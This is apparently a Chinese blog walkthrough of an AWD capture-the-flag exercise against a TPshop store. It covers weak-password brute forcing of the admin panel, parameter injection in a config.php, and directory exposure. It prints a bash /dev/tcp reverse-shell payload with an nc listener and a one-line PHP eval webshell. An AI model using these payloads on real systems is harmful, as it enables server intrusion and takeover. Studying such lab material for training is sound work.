AWD靶场TPshop后台获取shell

开局一个商城页面,具体内容全靠蒙

图片[1]-AWD靶场TPshop后台获取shell-魔法少女雪殇

常规套路直接访问后台页面

图片[2]-AWD靶场TPshop后台获取shell-魔法少女雪殇
图片[3]-AWD靶场TPshop后台获取shell-魔法少女雪殇

经过爆破,存在弱口令,账户admin 密码123456

找了半天也没找到上传点,然后进行本地的代码审计

发现在物流信息的config.php暗藏玄机

图片[4]-AWD靶场TPshop后台获取shell-魔法少女雪殇

这个desc就是简介内容,尝试写入POST参数

图片[5]-AWD靶场TPshop后台获取shell-魔法少女雪殇

提交成功

图片[6]-AWD靶场TPshop后台获取shell-魔法少女雪殇

进行代码审计的时候发现这个拥有目录泄露。。。

可以直接访问目录位置

图片[7]-AWD靶场TPshop后台获取shell-魔法少女雪殇

访问新建的目录内的config尝试post传参

图片[8]-AWD靶场TPshop后台获取shell-魔法少女雪殇
图片[9]-AWD靶场TPshop后台获取shell-魔法少女雪殇
五秒后返回相应,说明成功

尝试传参shell

我方维护机内输入nc -lvvp 端口

传参要指定在内网ip(有vps就用vps)一样

图片[10]-AWD靶场TPshop后台获取shell-魔法少女雪殇

参数构筑(要使用url编码):

bash -c "bash -i >& /dev/tcp/172.17.0.4/8858 0>&1"
图片[11]-AWD靶场TPshop后台获取shell-魔法少女雪殇

发送后直接反弹shell

图片[12]-AWD靶场TPshop后台获取shell-魔法少女雪殇
touch 1.php
echo  '<?php @eval($_POST['cmd']) ?>' > 1.php //对1.php写入一句话木马

菜刀直接访问

图片[13]-AWD靶场TPshop后台获取shell-魔法少女雪殇

链接成功

打开终端cat flag即可

图片[14]-AWD靶场TPshop后台获取shell-魔法少女雪殇

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情